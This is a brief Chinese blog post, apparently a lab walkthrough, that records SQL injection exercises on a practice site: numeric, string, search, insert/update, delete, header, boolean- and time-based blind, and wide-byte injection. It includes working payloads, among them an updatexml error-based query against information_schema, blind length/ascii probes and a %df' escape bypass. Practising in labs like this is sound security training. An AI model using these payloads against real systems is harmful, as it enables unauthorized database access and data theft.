数字型注入(post)
burp抓包
成功
字符型注入(get)
直接注入
成功注入。
搜索型注入
使用同样的方法也能同样注入成功
xx型注入
需要闭合
加)之后注入成功。
insert/updata 注入
a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘
burp抓包修改
注入成功。
delete 注入
注入成功
http header注入
注入成功
盲注 base on boolian
kobe‘ and length(database())>5#
。。。
kobe‘ and length(database())=7#
kobe‘ and ascii(substr(database(), 1, 1)) > 105#
慢慢盲注,只能挨个试。。
同样的也是挨个试,这次看对错是看这个反应时间,要是可以的话就会五秒多一些。
宽字节注入
刚开始尝试发现注入不行,抓包发现以及进行了编码
在抓包后修改也不行
发现‘被后台转移,所以构造payload kobe%df‘ or 1=1#
注入成功
原文:https://www.cnblogs.com/P201721440034/p/12063571.html